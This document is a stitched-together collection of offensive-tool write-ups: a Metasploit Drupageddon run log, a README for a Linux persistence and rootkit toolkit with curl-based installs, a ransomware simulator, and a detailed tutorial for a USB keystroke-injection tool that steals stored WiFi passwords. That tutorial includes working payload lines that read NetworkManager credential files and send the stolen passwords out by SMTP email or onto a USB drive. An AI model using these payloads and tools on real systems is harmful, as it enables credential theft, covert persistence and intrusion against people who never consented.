┃ # ┃ step ┃ params ┃
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ exploit/multi/http/drupal_drupageddon │ RHOSTS: 192.168.0.10 │
│ │ │ LHOST: 192.168.10.100 │
└───┴───────────────────────────────────────┴───────────────────────┘


catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All informations and codes are provided solely for educational purposes and/or testing your own systems.



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D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux


Demonized Shell is an Advanced Tool for persistence in linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and others features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • install for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.

Contribution

If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



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RansomwareSim - A Simulated Ransomware

Overview

RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.

Features

  • Encrypts specified file types within a target directory.
  • Changes the desktop wallpaper (Windows only).
  • Creates&Delete a README file on the desktop with a simulated ransom note.
  • Simulates communication with a command-and-control server to send system data and receive a decryption key.
  • Decrypts files after receiving the correct key.

Usage

Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE

Requirements

  • Python 3.x
  • cryptography
  • colorama

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/RansomwareSim.git
  2. Navigate to the project directory:

    cd RansomwareSim
  3. Install the required dependencies:

    pip install -r requirements.txt

My Book

Running the Control Server

  1. Open controlpanel.py.
  2. Start the server by running controlpanel.py.
  3. The server will listen for connections from RansomwareSim and the Decoder.

Running the Simulator

  1. Navigate to the directory containing RansomwareSim.
  2. Modify the main function in encoder.py to specify the target directory and other parameters.
  3. Run encoder.py to start the encryption process.
  4. Follow the instructions displayed on the console.

Running the Decoder

  1. Run decoder.py after the files have been encrypted.
  2. Follow the prompts to input the decryption key.

Disclaimer

RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:




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WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


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BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes


Little AV/EDR Evasion Lab for training & learning purposes. (️ under construction..)​

 ____            _     _____ ____  ____     ___   __   _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|


BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing EDR's user-mode detection methods that are frequently used by these security solutions.
These techniques are mainly based on a dynamic analysis of the target process state (memory, API calls, etc.),

Feel free to check this short article I wrote that describe the interception and analysis methods implemented by the EDR.


Defensive Techniques

In progress:


Usage

        Usage: BestEdrOfTheMarket.exe [args]

/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat


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